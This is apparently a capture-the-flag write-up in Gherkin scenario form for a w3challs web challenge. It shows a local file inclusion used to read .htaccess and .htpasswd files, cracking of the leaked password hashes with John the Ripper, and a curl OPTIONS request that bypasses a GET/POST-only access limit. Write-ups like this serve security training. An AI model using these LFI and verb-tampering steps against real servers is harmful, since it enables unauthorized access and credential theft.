## Version 2.0
## language: en

Feature:
  Site:
    w3challs
  Category:
    Web
  User:
    mr_once
  Goal:
    Get access to two different areas and capture the flags

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Arch Linux      | 2020.08.01    |
    | Firefox         | 79.0          |
    | curl            | 7.71.1        |
    | John the ripper | 1.9.0-jumbo-1 |
  Machine information:
    Given I am accessing the site at
    """
    http://htaccess.hax.w3challs.com/
    """
    And I have access to the source code

  Scenario: Success:Identify the vulnerabilities in the source code
    Given I have access to the source code
    When I take a look at ".htaccess"
    """
    RewriteEngine on
    RewriteBase /
    RewriteRule ^page/(.+)$ /index.php?page=$1.php [NC,L]
    """
    And in "index.php"
    """
    ...
    03  require_once __DIR__.'/inc/top.php';
    04
    05  if (isset($_GET['page']) && is_string($_GET['page'])) {
    06    $page = __DIR__.'/inc/'.$_GET['page'];
    ...
    """
    Then I can see that the site is vulnerable to LFI

  Scenario: Success:Get access to admin section
    Given that I know the site is vulnerable to LFI
    When I go to
    """
    http://htaccess.hax.w3challs.com/?page=../admin/.htaccess
    """
    Then I can see
    """
    AuthUserFile /home/htaccess/www/UlTr4_S3cR3T_p4Th/.htpasswd
    AuthGroupFile /dev/null
    AuthName "Private area"
    AuthType Basic require valid-user
    """
    When I go to
    """
    http://htaccess.hax.w3challs.com/?page=../UlTr4_S3cR3T_p4Th/.htpasswd
    """
    Then I can see a listo of users and passwords encrypted
    """
    admin1:$apr1$Ikl22aeJ$w1uWlBGlbatPnETT2XGx..
    admin2:$apr1$yJnQGpTi$WF5eCC/8lKsgBKY7fvag60
    admin3:$apr1$fN20xzIa$UAnYxYS8qRiO8WKPJwOlK1
    admin4:zQMI5ehC.sED2
    admin5:{SHA}CKVCPg9EZI8U9KPPakEXgfXrMIc=
    superadmin:{SHA}pAsyOzA/MHasbNO0OKRuXSp5sRI=
    """
    And I use john the ripper
    """
    $ john passwords
    """
    And I can see admin1's password [evidence](cracked.png)
    When I log into "/admin"
    Then I can see the flag
    """
    You bypassed the first .htaccess and successfully entered the admin area.
    Flag part 1 is W3C{__0hMyG0d

    Now try to bypass the second one to enter the superadmin are.
    Superadmin
    """

  Scenario: Fail:try to crack superadmin's password
    Given than now I have the first flag
    Then I try to crack superadmin's password
    But since this time craking the password is taking to loong
    And I decided to try another approach

  Scenario: Success:Access superadmin's section
    Given that cracking the password was taking too long
    When I decided to take a look at the source code at "superadmin/.htacess"
    """
    AuthUserFile /var/www/secret/.htpasswd_super
    AuthGroupFile /dev/null
    AuthName "Private area - superadmin only"
    AuthType Basic
    <Limit GET POST>
    require valid-user
    </Limit>
    """
    Then I can see that it only limit the access to methods POST and GET
    And I make a OPTIONS request to
    """
    $ curl -X OPTIONS http://htaccess.hax.w3challs.com/superadmin/index.php
    """
    And I get the second flag [evidences](secondflag.png)
    And I solve the challenge
